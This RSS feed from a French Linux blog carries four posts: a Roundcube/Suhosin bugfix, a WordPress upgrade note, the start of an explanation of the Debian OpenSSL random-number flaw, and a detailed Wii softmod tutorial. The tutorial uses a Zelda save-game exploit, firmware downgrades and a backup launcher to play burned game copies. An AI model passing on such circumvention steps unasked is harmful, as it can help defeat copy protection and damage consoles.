<?xml version="1.0" encoding="UTF-8"?> <rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" ><channel><title>Debian or not to be ? 2.0 &#187; bug</title> <atom:link href="http://www.crashdump.fr/tag/bug/feed/" rel="self" type="application/rss+xml" /><link>http://www.crashdump.fr</link> <description>that is the question</description> <lastBuildDate>Mon, 23 Jan 2012 13:14:39 +0000</lastBuildDate> <language>fr</language> <sy:updatePeriod>hourly</sy:updatePeriod> <sy:updateFrequency>1</sy:updateFrequency> <generator>http://wordpress.org/?v=</generator> <item><title>Bugfix: Roundcube quitte immédiatement après le login</title><link>http://www.crashdump.fr/tout-et-rien/bugfix-roundcube-quitte-immediatement-apres-le-login-804/</link> <comments>http://www.crashdump.fr/tout-et-rien/bugfix-roundcube-quitte-immediatement-apres-le-login-804/#comments</comments> <pubDate>Wed, 21 Apr 2010 12:50:55 +0000</pubDate> <dc:creator>Crashdump</dc:creator> <category><![CDATA[Tout-et-Rien]]></category> <category><![CDATA[bug]]></category> <category><![CDATA[php]]></category> <category><![CDATA[roundcube]]></category> <category><![CDATA[solution]]></category> <category><![CDATA[suhosin]]></category><guid isPermaLink="false">http://www.crashdump.fr/?p=804</guid> <description><![CDATA[<p><img width="240" height="150" src="http://www.crashdump.fr/wp-content/uploads/2010/04/roundcube.jpg" class="attachment-featured-image wp-post-image" alt="roundcube" title="roundcube" /></p><br />Certains l&#8217;on peut être remarqué, le serveur de crashdump.fr à migré et avec un nouveau setup super sexy: MySQL / NGINX / PHP FastCGI / XCache / Memcached: et donc un billet à venir sur l&#8217;installation de la chose dans les moindres détails. Ceci dit, comme toute nouvelle installation, parfois on se heurte à des [...]]]></description> <content:encoded><![CDATA[<p><img width="240" height="150" src="http://www.crashdump.fr/wp-content/uploads/2010/04/roundcube.jpg" class="attachment-featured-image wp-post-image" alt="roundcube" title="roundcube" /></p><br /><p><em>Certains l&#8217;on peut être remarqué, le serveur de crashdump.fr à migré et avec un nouveau setup super sexy: MySQL / NGINX / PHP FastCGI / XCache / Memcached: et donc un billet à venir sur l&#8217;installation de la chose dans les moindres détails. Ceci dit, comme toute nouvelle installation, parfois on se heurte à des bugs&#8230; pas évidents à résoudre, j&#8217;en ai fait les frais cet après-midi !</em></p><p>Roundcube c&#8217;est un webmail super sympa et vraiment bien fichu.. mais je viens de passer deux heures à essayer de régler un bug plutôt gênant: juste après l&#8217;authentification le script me jetai à la porte, comme un malpropre et sans message d&#8217;erreur !</p><p>Pour vous la faire courte, c&#8217;est Suhosin qui <del>foutait sa merde</del> est incompatible. Pour corriger le problème il faut modifier son php.ini pour y définir:</p><div class="codecolorer-container bash default" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><table cellspacing="0" cellpadding="0"><tbody><tr><td style="padding:5px;text-align:center;color:#888888;background-color:#EEEEEE;border-right: 1px solid #9F9F9F;font: normal 12px/1.4em Monaco, Lucida Console, monospace;"><div>1<br />2<br /></div></td><td><div class="bash codecolorer" style="padding:5px;font:normal 12px/1.4em Monaco, Lucida Console, monospace;white-space:nowrap"><span style="color: #7a0874; font-weight: bold;">&#91;</span>suhosin<span style="color: #7a0874; font-weight: bold;">&#93;</span><br /> suhosin.session.encrypt = Off</div></td></tr></tbody></table></div><p>(avec Apache, il est possible de passer par un .htaccess, ce qui limitera la modification au répertoire de roundcube).</p> ]]></content:encoded> <wfw:commentRss>http://www.crashdump.fr/tout-et-rien/bugfix-roundcube-quitte-immediatement-apres-le-login-804/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Lire les jeux gravés sur une Wii, méthode logicielle.</title><link>http://www.crashdump.fr/tout-et-rien/lire-les-jeux-graves-sur-une-wii-methode-logicielle-446/</link> <comments>http://www.crashdump.fr/tout-et-rien/lire-les-jeux-graves-sur-une-wii-methode-logicielle-446/#comments</comments> <pubDate>Mon, 15 Dec 2008 22:07:52 +0000</pubDate> <dc:creator>Crashdump</dc:creator> <category><![CDATA[Tout-et-Rien]]></category> <category><![CDATA[Backup]]></category> <category><![CDATA[Backup Channel]]></category> <category><![CDATA[bug]]></category> <category><![CDATA[carte sd]]></category> <category><![CDATA[console]]></category> <category><![CDATA[exploit]]></category> <category><![CDATA[faille]]></category> <category><![CDATA[Firmware]]></category> <category><![CDATA[hack]]></category> <category><![CDATA[homebrew]]></category> <category><![CDATA[jeux gravés]]></category> <category><![CDATA[modification]]></category> <category><![CDATA[Nintendo]]></category> <category><![CDATA[Pack]]></category> <category><![CDATA[patcher]]></category> <category><![CDATA[photos]]></category> <category><![CDATA[tutoriel]]></category> <category><![CDATA[twilight princess]]></category> <category><![CDATA[wad]]></category> <category><![CDATA[wii]]></category><guid isPermaLink="false">http://www.crashdump.fr/?p=446</guid> <description><![CDATA[<p><img width="240" height="150" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wii_will_rock_you.jpg" class="attachment-featured-image wp-post-image" alt="wii_will_rock_you" title="wii_will_rock_you" /></p><br />Je vais vous expliquer, ici comment &#171;&#160;patcher&#160;&#187; votre Wii pour pouvoir y installer des programmes tiers et pouvoir jouer à des jeux gravés (sauvegardes&#8230;). Mise à jour du tutoriel le: Samedi 28 avril 09&#8242; Une modification du système votre Wii peut, potentiellement, l&#8217;endommager. Je décline toutes responsabilités si le fait d&#8217;essayer cette méthode causait des [...]]]></description> <content:encoded><![CDATA[<p><img width="240" height="150" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wii_will_rock_you.jpg" class="attachment-featured-image wp-post-image" alt="wii_will_rock_you" title="wii_will_rock_you" /></p><br /><p><em>Je vais vous expliquer, ici comment &laquo;&nbsp;patcher&nbsp;&raquo; votre Wii pour pouvoir y installer des programmes tiers et pouvoir jouer à des jeux gravés (sauvegardes&#8230;).</em></p><p><em>Mise à jour du tutoriel le: Samedi 28 avril 09&#8242;</em></p><p><strong>Une modification du système votre Wii peut, potentiellement, l&#8217;endommager. Je décline toutes responsabilités si le fait d&#8217;essayer cette méthode causait des problèmes à votre console. De plus, vous n&#8217;avez le droit de copier un logiciel ou jeux que si vous possédez l&#8217;original (création d&#8217;une copie de sauvegarde). Par le non-respect de ce texte et des lois qui en résultent (disponibles dessous) vous vous rendez coupable de violation du code de la propriété intellectuelle. Crashdump.fr ne peut être tenu responsable des utilisations illicites (actes de piratage) exercé par l&#8217;un de ses lecteurs. </strong></p><p>DIRECTIVE EUROPEENE 91/250 DU 10-05-1991:<br /> - <em>Article 5 (extrait) Une personne ayant le droit d&#8217;utiliser le programme d&#8217;ordinateur ne peut être empêchée par contrat d&#8217;en faire une copie de sauvegarde dans la mesure où celle-ci est nécessaire pour cette utilisation. </em><br /> - <em>Liste des textes relatifs aux copies de sauvegarde (cette liste n&#8217;est pas exhaustive et les cas de jurisprudence n&#8217;y sont pas évoqués) : A122-4, 122-5, 122-6, 122-6-1, 122-6-2, 122-7, 131-3, R335-1 , R335-2 du code de la propriété intellectuelle. Directive Européenne 91/250 du 10/05/91 et 92/100 du 19/11/92.</em></p><p><strong><a href="http://www.crashdump.fr/myFiles/pics/TutoWii/">Retrouvez toutes les photos du Hack ici</a></strong></p><li><h2>Pré-requis</h2></li><li><h3>Matériels requis</h3></li><p>- Une Wii,<br /> - Le jeu &laquo;&nbsp;Zelda: Twilight Princess&nbsp;&raquo; (Version wii uniquement),<br /> - Une carte SD (attention aux cartes SD de plus de 2Go/SDHC.. elles peuvent poser problème),<br /> - Un moyen de lire/ecrire sur votre carte SD via un ordinateur,<br /> - Une manette gamecube,<br /> - Une connexion internet sur votre Wii,<br /> - Le pack de logiciels (disponible ci-dessous).</p><p><em>Trois packs sont disponibles ici, pour trois situations différentes. En effet, suivant le firmware de votre Wii la procédure change un petit peu !</em><br /> <strong>MAJ</strong>: <em>Nouvelle version des packs (v2), mise à jour: du Twilight Hack et du Homebrew channel. Les anciens packs sont toujours disponibles au cas où&#8230;</em><br /> Pour une Wii v3.2E: <a title="WiiPatchPack3.2Ev2.zip" href="http://www.crashdump.fr/wp-content/uploads/2008/12/WiiPatchPack3.2Ev2.zip" target="_blank">WiiPatchPack3.2Ev2.zip</a> &#8211; (Pack v1 disponible <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/WiiPatchPack3.2E.zip">ici</a>)<br /> Pour une Wii v3.3E: <a title="WiiPatchPack3.3Ev2.zip" href="http://www.crashdump.fr/wp-content/uploads/2008/12/WiiPatchPack3.3Ev2.zip" target="_blank">WiiPatchPack3.3Ev2.zip</a> &#8211; (Pack v1 disponible <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/WiiPatchPack3.3E.zip">ici</a>)<br /> Pour une Wii v3.4E: <a title="WiiPatchPack3.4Ev2.zip" href="http://www.crashdump.fr/wp-content/uploads/2008/12/WiiPatchPack3.4Ev2.zip" target="_blank">WiiPatchPack3.4Ev2.zip</a> &#8211; (Pack v1 disponible <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/WiiPatchPack3.4E.zip">ici</a>)</p><p>Si votre Wii utilise un firmware antérieur au 3.x faites une mise à jours en 3.4 avant de commencer. (Si vous faites cette mise à jours en ligne, attention à l&#8217;évolution des firmwares Nintendo.. il n&#8217;est pas dit que nous puissions toujours exploiter les mêmes bugs sur un hypothétique Firmware &gt; 3.5.)</p><li><h3>Contenu du pack</h3></li><p>- Homebrew Channel 10.1,<br /> - Channel File Manager 2.0 beta 2,<br /> - cIOS Rev7,<br /> - cIOS Uninstaller,<br /> - Backup Creator,<br /> - cIOS Downgrader,<br /> - ImgBurn,<br /> - Chaine Backup Launcher 0.3 Gamma Autoboot,<br /> - Starfall,<br /> - Sauvegarde Twlight Hack.</p><li><h2>1. Preparation de la carte SD</h2></li><p>Tout d’abord, il faut savoir quel firmware est installé sur votre wii:</p><ul><li>A partir du menu de lancement, cliquer sur « <strong>wii</strong> », puis « <strong>parametres wii</strong> »,</li><li>En haut a droite, vous verrez la version du firmware installé (3.3 E, 3.2 E …),</li><li>Selon la version, dezippez le contenu du pack correspondant sur votre carte SD.</li></ul><li><h2>2. Installation de la faille Zelda (twilight hack) et de la chaine homebrew, qui permettra de lancer les applications tierces.</h2></li><ul><li>Mettez votre carte SD dans votre Wii,</li><li>Allumez votre wii puis allez dans : &laquo;&nbsp;(<strong>Wii</strong>)&nbsp;&raquo; (En bas à gauche) &#8211;&gt; &laquo;&nbsp;<strong>Gestion des donnée</strong>s&nbsp;&raquo; &#8211;&gt; &laquo;&nbsp;<strong>Données de sauvegarde</strong>&nbsp;&raquo; &#8211;&gt; &laquo;&nbsp;<strong>Carte SD</strong>&nbsp;&raquo; &#8211;&gt; Copiez la sauvegarde &laquo;&nbsp;<strong>Twilight Hack</strong>&nbsp;&raquo; (eur, jap, usa, selon la provenance de votre console),<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_1.jpg"><img class="alignnone size-thumbnail wp-image-450" title="wiipatchtuto_1" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_1-430x125.jpg" alt="wiipatchtuto_1" width="430" height="125" /></p><p></a></li><li>Insérez le jeu &laquo;&nbsp;<strong>Zelda : Twilight Princess</strong>&nbsp;&raquo; dans votre Wii et lancez le par la chaîne disque,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_2.jpg"><img class="alignnone size-thumbnail wp-image-451" title="wiipatchtuto_2" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_2-430x125.jpg" alt="wiipatchtuto_2" width="430" height="125" /></p><p></a></li><li>Après avoir appuyez sur &laquo;&nbsp;<strong>A+B</strong>&nbsp;&raquo; choisissez la sauvegarde nommée &laquo;&nbsp;<strong>Twilight Hack</strong>&laquo;&nbsp;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_3.jpg"><img class="alignnone size-thumbnail wp-image-452" title="wiipatchtuto_3" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_3-430x125.jpg" alt="wiipatchtuto_3" width="430" height="125" /></p><p></a></li><li>Une fois dans le jeu , reculez de quelques pas, ou allez parler à la personne en face de vous,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_4.jpg"><img class="alignnone size-thumbnail wp-image-453" title="wiipatchtuto_4" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_4-430x125.jpg" alt="wiipatchtuto_4" width="430" height="125" /></p><p></a></li><li>Votre écran devient noir avec plusieurs phrases en blanche,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_5.jpg"><img class="alignnone size-thumbnail wp-image-454" title="wiipatchtuto_5" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_5-430x125.jpg" alt="wiipatchtuto_5" width="430" height="125" /></p><p></a></li><li>suivez les instructions ;<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_6.jpg"><img class="alignnone size-thumbnail wp-image-455" title="wiipatchtuto_6" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_6-430x125.jpg" alt="wiipatchtuto_6" width="430" height="125" /></p><p></a></li><li>votre Wii redémarre et vous avez une nouvelle chaine sur votre menu Wii qui se     nomme &nbsp;&raquo;<strong>the homebrew channel</strong>&laquo;&nbsp;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_7.jpg"><img class="alignnone size-thumbnail wp-image-456" title="wiipatchtuto_7" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_7-430x125.jpg" alt="wiipatchtuto_7" width="430" height="125" /></p><p></a></li><li>La chaîne est désormais installée.<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_8.jpg"><img class="alignnone size-thumbnail wp-image-457" title="wiipatchtuto_8" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_8-430x125.jpg" alt="wiipatchtuto_8" width="430" height="125" /></a></li></ul><li><h2>3. Si votre Wii est en firmware 3.3E ou 3.4E, il va falloir le ‘downgrader’, en 3.2E, sinon, passez directement a l’étape 4.</h2><p>Pour cette étape, votre Wii devra être connecté à Internet pour deux raisons: La mise à jours de la chaîne Homebrew et le téléchargement du firmware 3.2E.</li><ul><li>Lancez la chaîne &laquo;&nbsp;<strong>the homebrew channel</strong>&laquo;&nbsp; (La chaîne va chercher une mise à jour, n&#8217;hésitez pas à l&#8217;appliquer),<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_9.jpg"><img class="alignnone size-thumbnail wp-image-458" title="wiipatchtuto_9" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_9-430x125.jpg" alt="wiipatchtuto_9" width="430" height="125" /></p><p></a></li><li>Lancez &laquo;&nbsp;<strong>Wad Manager v1.3</strong>&laquo;&nbsp;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_10.jpg"><img class="alignnone size-thumbnail wp-image-461" title="wiipatchtuto_10" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_10-430x125.jpg" alt="wiipatchtuto_10" width="430" height="125" /></p><p></a></li><li>installez &laquo;&nbsp;<strong>IOS16-64-v257-prod.wad</strong>&nbsp;&raquo; avec la touche &laquo;&nbsp;<strong>+</strong>&laquo;&nbsp;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_11.jpg"><img class="alignnone size-thumbnail wp-image-462" title="wiipatchtuto_11" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_11-430x125.jpg" alt="wiipatchtuto_11" width="430" height="125" /></p><p></a></li><li>Revenez à la chaîne &laquo;&nbsp;<strong>the homebrew channel</strong>&laquo;&nbsp;, lancez &laquo;&nbsp;<strong>Wad Manager IOS 16</strong>&nbsp;&raquo; et installez &laquo;&nbsp;CIOS Fix&nbsp;&raquo;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_12.jpg"><img class="alignnone size-thumbnail wp-image-463" title="wiipatchtuto_12" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_12-430x125.jpg" alt="wiipatchtuto_12" width="430" height="125" /></p><p></a></li><li>Revenez à la chaîne &laquo;&nbsp;<strong>the homebrew channel</strong>&laquo;&nbsp;, lancez &laquo;&nbsp;<strong>Cios-Downgrader</strong>&nbsp;&raquo; pour downgrader votre Wii en <strong>3.2E (le E est très important, il signifie Européen)</strong>,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_13.jpg"><img class="alignnone size-thumbnail wp-image-464" title="wiipatchtuto_13" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_13-430x125.jpg" alt="wiipatchtuto_13" width="430" height="125" /></p><p></a></li><li>Revenez à la chaîne &nbsp;&raquo;<strong>the homebrew channel</strong>&nbsp;&raquo; et enfin, lancez &laquo;&nbsp;<strong>IOS Downgrader V1</strong>&laquo;&nbsp;.</li></ul><li><h2>4. Installation du cIOS 0.3 Gamma de Wiigator.</h2></li><ul><li>Lancez la chaîne &laquo;&nbsp;<strong>the homebrew channel</strong>&laquo;&nbsp;, lançez &laquo;&nbsp;<strong>cIOS Rev7</strong>&laquo;&nbsp;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_14.jpg"><img class="alignnone size-thumbnail wp-image-465" title="wiipatchtuto_14" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_14-430x125.jpg" alt="wiipatchtuto_14" width="430" height="125" /></p><p></a></li><li>Choisissez &laquo;&nbsp;<strong>wad installation</strong>&nbsp;&raquo; (ou &laquo;&nbsp;network&nbsp;&raquo; pour avoir la dernière mise à jours, si vous êtes connecté en wifi), suivez les indications, en sachant que le bouton 1 de la wiimote correspond à &laquo;&nbsp;accept&nbsp;&raquo;, le 2 à &laquo;&nbsp;cancel&nbsp;&raquo;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_15.jpg"><img class="alignnone size-thumbnail wp-image-466" title="wiipatchtuto_15" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_15-430x125.jpg" alt="wiipatchtuto_15" width="430" height="125" /></p><p></a></li><li>Sélectionnez le firmware 3.2E et installez le (la liste continue vers le bas, il suffit de descendre&#8230;),<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_16.jpg"><img class="alignnone size-thumbnail wp-image-467" title="wiipatchtuto_16" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_16-430x125.jpg" alt="wiipatchtuto_16" width="430" height="125" /></p><p></a></li><li>Une fois terminée , revenez sur la chaîne the homebrew channel, lancez &laquo;&nbsp;<strong>Channel File Manager 2.0 beta 2</strong>&laquo;&nbsp;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_17.jpg"><img class="alignnone size-thumbnail wp-image-468" title="wiipatchtuto_17" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_17-430x125.jpg" alt="wiipatchtuto_17" width="430" height="125" /></p><p></a></li><li>Suivez les instructions et installez le fichier &laquo;&nbsp;<strong>[Chaîne] Backup Launcher 0.3 Gamma Autoboot</strong>&laquo;&nbsp;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_18.jpg"><img class="alignnone size-thumbnail wp-image-469" title="wiipatchtuto_18" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_18-430x125.jpg" alt="wiipatchtuto_18" width="430" height="125" /></p><p></a></li><li>Vous avez désormais une nouvelle chaîne sur votre menu Wii , celle-ci permet de lancer les backups sur votre Wii, vous pouvez relancer la &laquo;&nbsp;channel file manager&nbsp;&raquo; pour installer toutes les applications wad dont vous aurez besoin (ex: dans le pack, il y a un lecteur audio/video, &laquo;&nbsp;Mplayer&nbsp;&raquo;).</li></ul><li><h2>3. Installation de la protection contre le brick et les mises à jours automatiques de votre Wii.</h2></li><p>(Optionnelle , uniquement pour les Wii en 3.2E , empêche les mises à jours automatique de Nintendo)</p><ul><li>Allez dans la chaîne &laquo;&nbsp;the homebrew channel&nbsp;&raquo;, lancez &laquo;&nbsp;Starfall&nbsp;&raquo;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_19.jpg"><img class="alignnone size-thumbnail wp-image-470" title="wiipatchtuto_19" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_19-430x125.jpg" alt="wiipatchtuto_19" width="430" height="125" /></p><p></a></li><li>appuyez simultanément sur &laquo;&nbsp;B+1&#8243; et pas &laquo;&nbsp;B+2&#8243; (C&#8217;est une erreur de programmeur),<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_20.jpg"><img class="alignnone size-thumbnail wp-image-471" title="wiipatchtuto_20" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_20-430x125.jpg" alt="wiipatchtuto_20" width="430" height="125" /><br /> </a></li><li>Un nouveau menu apparait, sélectionnez les 3 dernières options et appuyez sur avec &laquo;&nbsp;A&nbsp;&raquo; avec chacune d&#8217;elle pour que ça affiche &laquo;&nbsp;Install&nbsp;&raquo;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_21.jpg"><img class="alignnone size-thumbnail wp-image-472" title="wiipatchtuto_21" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_21-430x125.jpg" alt="wiipatchtuto_21" width="430" height="125" /><br /> </a></li><li>Une fois que les 3 dernières options ont été appliquées , appuyez sur &laquo;&nbsp;2&#8243;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_22.jpg"><img class="alignnone size-thumbnail wp-image-473" title="wiipatchtuto_22" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_22-430x125.jpg" alt="wiipatchtuto_22" width="430" height="125" /><br /> </a></li><li>Éteignez votre Wii, Branchez votre manette Gamecube,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_23.jpg"><img class="alignnone size-thumbnail wp-image-474" title="wiipatchtuto_23" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_23-430x125.jpg" alt="wiipatchtuto_23" width="430" height="125" /><br /> </a></li><li>Allumez votre Wii en maintenant appuyer le bouton &laquo;&nbsp;Y&nbsp;&raquo; de la manette, Un écran noir s&#8217;affiche indiquant &laquo;&nbsp;3.2E&nbsp;&raquo;,<br /> <a href="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_24.jpg"><img class="alignnone size-thumbnail wp-image-475" title="wiipatchtuto_24" src="http://www.crashdump.fr/wp-content/uploads/2008/12/wiipatchtuto_24-430x125.jpg" alt="wiipatchtuto_24" width="430" height="125" /><br /> </a></li><li>L&#8217;installation de la protection contre le brick de votre Wii est terminée.</li></ul><li><h2>4. Questions/Réponses</h2></li><li><strong>1. Comment graver mes jeux ?</strong></li><p>Utilisez la fonction ‘graver l’image’ de votre logiciel préfère (pas de problème avec imgburn ou nero). Lancez la gravure a la vitesse la plus basse possible, et uniquement sur des DVD -R2. Comment jouer à mes backups ?<br /> - Lancez la chaîne &laquo;&nbsp;Backup Channel&nbsp;&raquo;,<br /> - Faîtes &laquo;&nbsp;Demarrer&nbsp;&raquo;.</p><li><strong>2. J&#8217;ai une erreur &laquo;&nbsp;file boot.dol not found (-1)&nbsp;&raquo; lors de l&#8217;exploit du twilight hack, que faire ?</strong></li><p>- Utilisez les packs disponibles ici, ils sont cohérent, si vous en utilisez d&#8217;autres je ne pourrais sûrement pas vous aider.<br /> - Vérifiez que vôtre carte SD est bien formatée en FAT32 (voir FAT16).<br /> - Si vôtre carte SD fait plus de 2Go ou qu&#8217;elle est SDHC, cela peu poser des problèmes.. essayez avec une autre.</p><li><strong>3. Comme tout désinstaller pour que ma Wii redevienne comme avant ?</strong></li><p>- Mettez votre carte SD dans votre Wii,<br /> - Lancez la chaîne &laquo;&nbsp;the homebrew channel&nbsp;&raquo;,<br /> - Lancez &laquo;&nbsp;Channel File Manager 2.0 beta 2&#8243;,<br /> - Suivez les instructions pour désinstaller le fichier &laquo;&nbsp;[Chaine] Backup Launcher 0.3 Gamma Autoboot&nbsp;&raquo;.<br /> - Revenez à la chaîne &laquo;&nbsp;the homebrew channel&nbsp;&raquo;,<br /> - Lancez &laquo;&nbsp;cIOS Uninstaller&nbsp;&raquo;,<br /> - Revenez au menu Wii,<br /> - Allez dans : &laquo;&nbsp;(Wii)&nbsp;&raquo; [En bas à gauche] &#8211;&gt; &laquo;&nbsp;Gestion des données&nbsp;&raquo; &#8211;&gt; &laquo;&nbsp;Données de sauvegarde&nbsp;&raquo; &#8211;&gt; &laquo;&nbsp;Wii&nbsp;&raquo; &#8211;&gt; Supprimez la sauvegarde ‘Twilight Hack’,<br /> - Allez dans : &laquo;&nbsp;(Wii)&nbsp;&raquo; [En bas à gauche] &#8211;&gt; &laquo;&nbsp;Gestion des données&nbsp;&raquo; &#8211;&gt; &laquo;&nbsp;Chaînes&nbsp;&raquo; &#8211;&gt; Supprimez la chaîne &laquo;&nbsp;the homebrew channel&nbsp;&raquo;,<br /> - Faites un formatage de votre Wii,<br /> - Votre wii est comme neuve.</p><li><strong>4. Que faire si ma Wii est brickée ?</strong></li><p>- Mettez la carte SD dans votre Wii,<br /> - Éteignez votre Wii,<br /> - Branchez votre manette Gamecube,<br /> - Allumez votre wii en maintenant le bouton &laquo;&nbsp;Y&nbsp;&raquo; appuyé,<br /> - Lancez la sauvegarde &laquo;&nbsp;Twilight Hack&nbsp;&raquo;,<br /> - Parlez à la personne en face de vous,<br /> - Suivez les instructions,<br /> - Downgradez ou Upgradez votre console en la version désiré mais en version &laquo;&nbsp;E&nbsp;&raquo;,<br /> - Votre Wii est désormais réparée.</p> ]]></content:encoded> <wfw:commentRss>http://www.crashdump.fr/tout-et-rien/lire-les-jeux-graves-sur-une-wii-methode-logicielle-446/feed/</wfw:commentRss> <slash:comments>169</slash:comments> </item> <item><title>Suite a un bug souci avec WP2.6</title><link>http://www.crashdump.fr/tout-et-rien/suite-a-un-bug-souci-avec-wp26-162/</link> <comments>http://www.crashdump.fr/tout-et-rien/suite-a-un-bug-souci-avec-wp26-162/#comments</comments> <pubDate>Wed, 16 Jul 2008 18:10:49 +0000</pubDate> <dc:creator>Crashdump</dc:creator> <category><![CDATA[Tout-et-Rien]]></category> <category><![CDATA[bug]]></category> <category><![CDATA[rewrite rules]]></category> <category><![CDATA[wordpress]]></category><guid isPermaLink="false">http://blog.crashdump.fr/?p=162</guid> <description><![CDATA[Petit post pour vous prévenir que suite a un souci avec la mise a jours de WordPress 2.6 j&#8217;ai du opérer pas mal de changements sur le moteur du blog, donc si vous rencontrez des soucis n&#8217;hésitez pas a m&#8217;en faire part. De plus, j&#8217;en ai profité pour changer les rewrites rules.. pour quelques chose [...]]]></description> <content:encoded><![CDATA[<p>Petit post pour vous prévenir que suite a un souci avec la mise a jours de WordPress 2.6 j&#8217;ai du opérer pas mal de changements sur le moteur du blog, donc si vous rencontrez des soucis n&#8217;hésitez pas a m&#8217;en faire part. De plus, j&#8217;en ai profité pour changer les rewrites rules.. pour quelques chose de moins moche.</p><p>Merci de votre compréhension :)</p> ]]></content:encoded> <wfw:commentRss>http://www.crashdump.fr/tout-et-rien/suite-a-un-bug-souci-avec-wp26-162/feed/</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>Faille SSL Debian (RGN)</title><link>http://www.crashdump.fr/debian/faille-ssl-debian-rgn-147/</link> <comments>http://www.crashdump.fr/debian/faille-ssl-debian-rgn-147/#comments</comments> <pubDate>Mon, 26 May 2008 18:51:35 +0000</pubDate> <dc:creator>Crashdump</dc:creator> <category><![CDATA[Debian]]></category> <category><![CDATA[Réseaux]]></category> <category><![CDATA[Sécurité]]></category> <category><![CDATA[bug]]></category> <category><![CDATA[DSA]]></category> <category><![CDATA[faille]]></category> <category><![CDATA[Luciano Bello]]></category> <category><![CDATA[Manitoba]]></category> <category><![CDATA[OpenSSL]]></category> <category><![CDATA[prng]]></category> <category><![CDATA[random]]></category> <category><![CDATA[RSA]]></category> <category><![CDATA[ssh]]></category> <category><![CDATA[vulnerabilité]]></category><guid isPermaLink="false">http://blog.crashdump.fr/?p=147</guid> <description><![CDATA[Le 13 Mai 2008, Le projet Debian annonçais ce que Luciano Bello avais trouvé: Une vulnérabilité dans le package &#171;&#160;OpenSSL&#160;&#187;. Le bug en question est causé par la suppression pure et simple du code suivant dans md_rand.c: 123MD_Update(&#38;m,buf,j); [ .. ] MD_Update(&#38;m,buf,j); /* purify complains */ Ces lignes ont été retirée parce qu&#8217;elle produisait des [...]]]></description> <content:encoded><![CDATA[<p>Le 13 Mai 2008, Le projet Debian annonçais ce que Luciano Bello avais trouvé: Une vulnérabilité dans le package &laquo;&nbsp;OpenSSL&nbsp;&raquo;. Le bug en question est causé par la suppression pure et simple du code suivant dans md_rand.c:</p><div class="codecolorer-container text default" style="overflow:auto;white-space:nowrap;border:1px solid #9F9F9F;width:435px;"><table cellspacing="0" cellpadding="0"><tbody><tr><td style="padding:5px;text-align:center;color:#888888;background-color:#EEEEEE;border-right: 1px solid #9F9F9F;font: normal 12px/1.4em Monaco, Lucida 